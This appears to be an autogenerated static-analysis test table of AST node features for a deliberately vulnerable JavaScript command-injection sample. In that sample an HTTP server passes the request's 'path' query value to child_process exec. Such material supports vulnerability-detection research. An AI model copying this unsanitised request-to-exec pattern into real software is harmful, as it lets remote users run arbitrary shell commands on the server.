autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:24 | process.nextTick | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:24 | process.nextTick | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:24 | process.nextTick | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:24 | process.nextTick | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | exceptional return of process ... terate) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | exceptional return of process ... terate) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | exceptional return of process ... terate) | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | exceptional return of process ... terate) | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | exceptional return of process ... terate) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | process ... terate) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | process ... terate) | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | process ... terate) | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | process ... terate) | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:33 | process ... terate) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:17:8:24 | nextTick | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:17:8:24 | nextTick | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:17:8:24 | nextTick | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:17:8:24 | nextTick | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:17:8:24 | nextTick | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | CalleeFlexibleAccessPath | process.nextTick | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | calleeImports | process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:26:8:32 | iterate | receiverName | process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | asyncEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | asyncEach | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | asyncEach | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | this | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | this | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | this | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:13:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | 'arguments' object of function execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | 'arguments' object of function execEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | 'arguments' object of function execEach | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | 'arguments' object of function execEach | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | 'arguments' object of function execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | exceptional return of function execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | exceptional return of function execEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | exceptional return of function execEach | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | exceptional return of function execEach | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | exceptional return of function execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | functio ... T OK \\n} | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | functio ... T OK \\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | functio ... T OK \\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | return of function execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | return of function execEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | return of function execEach | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | return of function execEach | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:1:15:1 | return of function execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:10:13:17 | execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:10:13:17 | execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:10:13:17 | execEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:10:13:17 | execEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:10:13:17 | execEach | contextSurroundingFunctionParameters | (commands) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:10:13:17 | execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:10:13:17 | execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | contextSurroundingFunctionParameters | (commands) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:13:19:13:26 | commands | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:11 | asyncEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:11 | asyncEach | contextSurroundingFunctionParameters | (commands) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:11 | asyncEach | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:11 | asyncEach | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:11 | asyncEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | asyncEa ... mmand)) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | asyncEa ... mmand)) | contextSurroundingFunctionParameters | (commands) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | asyncEa ... mmand)) | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | asyncEa ... mmand)) | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | asyncEa ... mmand)) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | exceptional return of asyncEa ... mmand)) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | exceptional return of asyncEa ... mmand)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | exceptional return of asyncEa ... mmand)) | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | exceptional return of asyncEa ... mmand)) | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:3:14:49 | exceptional return of asyncEa ... mmand)) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:13:14:20 | commands | CalleeFlexibleAccessPath | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:13:14:20 | commands | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:13:14:20 | commands | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:13:14:20 | commands | contextSurroundingFunctionParameters | (commands) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:13:14:20 | commands | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:13:14:20 | commands | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:13:14:20 | commands | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:22 | exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:22 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:22 | exec | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:22 | exec | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:22 | exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | 'arguments' object of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | 'arguments' object of anonymous function | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | 'arguments' object of anonymous function | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | 'arguments' object of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | (comman ... ommand) | CalleeFlexibleAccessPath | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | (comman ... ommand) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | (comman ... ommand) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | (comman ... ommand) | contextSurroundingFunctionParameters | (commands)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | (comman ... ommand) | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | (comman ... ommand) | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | (comman ... ommand) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | exceptional return of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | exceptional return of anonymous function | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | exceptional return of anonymous function | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | exceptional return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | return of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | return of anonymous function | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | return of anonymous function | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:23:14:48 | return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | contextSurroundingFunctionParameters | (commands)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:24:14:30 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:39 | exec | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:39 | exec | contextSurroundingFunctionParameters | (commands)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:39 | exec | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:39 | exec | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:39 | exec | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exceptional return of exec(command) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exceptional return of exec(command) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exceptional return of exec(command) | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exceptional return of exec(command) | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exceptional return of exec(command) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exec(command) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exec(command) | contextSurroundingFunctionParameters | (commands)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exec(command) | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exec(command) | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:36:14:48 | exec(command) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | contextSurroundingFunctionParameters | (commands)\n(command) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | enclosingFunctionBody | commands asyncEach commands command exec command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | enclosingFunctionName | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:14:41:14:47 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:7 | require | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:7 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:7 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | exceptional return of require('http') | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | exceptional return of require('http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | require('http') | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:15 | require('http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:28 | require ... eServer | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:28 | require ... eServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:17:28 | require ... eServer | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | exceptional return of require ... d]);\\n}) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | exceptional return of require ... d]);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | exceptional return of require ... d]);\\n}) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | require ... d]);\\n}) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | require ... d]);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:1:20:2 | require ... d]);\\n}) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:9:17:14 | 'http' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:9:17:14 | 'http' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:9:17:14 | 'http' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:9:17:14 | 'http' | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:9:17:14 | 'http' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:9:17:14 | 'http' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:17:17:28 | createServer | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:17:17:28 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:17:17:28 | createServer | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | execEach | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | execEach | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | execEach | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | require | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | require | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | require | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | require | fileImports | child_process http url | +| 